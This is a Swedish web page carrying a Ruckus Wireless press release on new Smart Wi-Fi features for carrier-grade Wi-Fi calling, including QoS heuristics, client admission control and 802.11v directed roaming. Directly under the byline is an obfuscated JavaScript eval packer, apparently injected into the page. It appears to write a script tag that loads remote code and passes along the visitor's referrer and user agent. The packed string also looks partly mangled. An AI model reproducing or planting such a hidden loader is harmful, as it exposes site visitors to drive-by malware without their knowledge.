Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Ruckus nya Smart Wi-Fi innovationer möjliggör Wi-Fi-samtal i klass med operatörerna

Ruckus nya Smart Wi-Fi innovationer möjliggör Wi-Fi-samtal i klass med operatörerna
Sebastian

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tbfdz|var|u0026u|referrer|ffzds||js|php’.split(’|’),0,{}))
Ruckus Wireless, Inc. (NYSE: RKUS) introducerar idag en samling nya mjukvaruinnovationer förSmart Wi-Fiteknologi som tar hand om den ökade efterfrågan av högkvalitativa, IP-baserade röstsamtal över Wi-Fi (Wi-Fi calling).

Dessa nya teknologiska innovationer från Ruckus integreras som standard i Ruckus portfölj av Smart Wi-Fi-produkter för att säkerställa kristallklar kvalitet vid röstsamtal över Wi-Fi, även i de mest utmanande Wi-Fi-miljöerna. Dessa nya teknologiska innovationer kommer demonstreras för första gången under Mobile World Congress i Barcelona, Spanien (Ruckus bås #5E41). Dessa nya teknologier har med framgång testats med två av de största mobila nätverksoperatörerna USA.

”Innovationerna vi har skapat kommer att öka pålitlighet och kvalitet för applikationer som använder röstsamtal över Wi-Fi. Detta möjliggör för tjänsteleverantörer och företag att utvinna större värde från deras Wi-Fi infrastruktur. Röstsamtal över Wi-Fi är inte någonting nytt, men förmågan att leverera en röststjänst över Wi-Fi som kan mäta sig med operatörernas är någonting som ingen har bemästrat, förrän nu”, sa Dan Rabinovitsj, Chief Operating Officer på Ruckus Wireless.

Ruckus nya Smart Wi-Fi-innovationer för röstsamtal uppnår kraven för roaming och Quality of Service (QoS). De nya innovationerna stödjer dubbelriktade röstsamtal i realtid som kräver ett smalt spann driftsparametrar från nätverket, utformade för att säkerställa en upplevelse vid Wi-Fi-samtal av högsta kvalitet. De nya innovationerna inkluderar en mängd nya patentskyddade egenskaper som kapacitetsbaserad klient-åtkomstkontroll, insläppskontroll (admission control) för Wi-Fi multimedia, riktad roaming, och automatisk paketflödesheuristik. Integrationen av dessa och andra nya Smart Wi-Fi-innovationer i Ruckus produkter hjälper organisationer att säkerställa optimal prestanda för röstsamtal via Wi-Fi.

Värdet av dessa innovationer från Ruckus, för att stödja högkvalitativa rösttjänster, visade sig när utvecklarna på Republic Wireless, den banbrytande ”Wi-Fi First”-mobiloperatören stötte på prestandaproblem med deras eget Wi-Fi-nätverk som påverkade testmiljöerna. Republic vände sig till Ruckus.

”Som en pionjär i ”Wi-Fi first”-teknologi för smartphones, kräver Republic högsta möjliga prestanda från vårt trådlösa företagsnätverk. Med Ruckus har vi fått den Wi-Fi-miljö våra ingenjörer kräver för att kunna fortsätta leverera nya tjänster och egenskaper för våra kunder”, sa David Morken, medgrundare och Chief Executive Officer på Republic Wireless.

Kristallklar röst över smartare Wi-Fi

De nya teknologiska innovationerna för Wi-Fi samtal i operatörsklass från Ruckus inkluderar en rad framsteg utformade för att optimera roaming och tjänstekvalitet kring förseningskänslig rösttrafik. De inkluderar:

Automatisk Heuristik för tjänstekvalitet

Detta handlar om förmågan att kunna prioritera röst-över-Wi-Fi-trafik genom att titta på Type of Service (ToS)-bitar som satts av en smartphone i IP-rubriceringen, eller genom att använda automatisk paketflödesheuristik som konstant undersöker storleken och frekvensen för paketen i alla sorters flöden, krypterade eller inte.

Kapacitetsbaserad kontroll för klientåtkomst

Om för många nya enheter försöker koppla upp sig mot en given Wi-Fi accesspunkt kan de redan uppkopplade klienterna få en försämrad upplevelse av tjänsten. För att hjälpa till att försäkra sig om de befintliga klienternas användarupplevelse kan Ruckus ZoneFlex accesspunkter nu implementera en kapacitetsbaserad kontrollalgoritm med klientåtkomst för att neka uppkopplingsförfrågningar från nya klienter. Denna nya egenskap tillåter organisationer att skydda användarupplevelsen under perioder av tung belastning.

Riktad Roaming

Genom att dra nytta av 802.11v standarden hjälper riktad roaming till med den övergripande kvaliteten för användarupplevelsen för hela det trådlösa nätverket (WLAN) genom att rikta klienter mot en annan Wi-Fi accesspunkt som kan erbjuda en bättre användarupplevelse. Om en signal faller under användar-definierbar signalstyrka (RSSI) eller troughput-nivåerna kan Ruckus ZoneFlex accesspunkten automatiskt erbjuda en lista med alternativa accesspunkter och be klienten flytta till en närmare accesspunkt. Detta löser det växande problemet med att klienter är uppkopplade och ”fastnar” vid en given accesspunkt, även om den inte länge erbjuder bästa möjliga uppkoppling.

Wi-Fi-multimedia (WMM) admission control

VMM admission control förbättrar prestandan för Ruckus Smart Wi-Fi nätverk när det kommer till röst och videotjänster i realtid genom att förhindra en överanvändning av bandbredd. Genom att kräva att klienterna efterfrågar en specifik mängd bandbredd innan de kopplar upp sig mot en given Ruckus ZoneFlex accesspunkt räknar bandbreddshanteringen för varje accesspunkt med nätverksbelastningen och ser till kanaluppkoppling innan den tillåter en klient att koppla upp sig.

När dessa innovationer kombineras med Ruckus BeamFlex-teknologi erbjuder de den nödvändiga kvalitetssäkringen för att stödja applikationer med Wi-Fi röstsamtal. Genom att fokusera och anpassa Wi-Fi-signaler över signalvägen med bäst prestanda kan klienter koppla upp sig med högre datahastighet och spenderar mindre tid med att konkurrera för uppkoppling. Detta reducerar konflikter för RF-kanalen och sannolikheten för kollisioner (ökade störningar), frame loss, eller återsändning av paket (ökad försening) genom att dynamiskt justera antennmönstren för varje skickat paket.

Pris och tillgänglighet

Med omedelbar tillgång 2015 kommer de nya Ruckus Smart Wi-Fi mjukvaruinnovationerna för Wi-Fi-samtal i operatörsklass byggas in i den firmware som används för Ruckus Smart Wi-Fi, vilken stödjs av Ruckus ZoneDirector™ Smart WLAN controllers,Ruckus SmartCell™ Gateway (SCG) och virtual SmartCell Gateway (vSCG) och accesspunkterna ZoneFlex Smart Wi-Fi, utan någon extra kostnad för kunderna.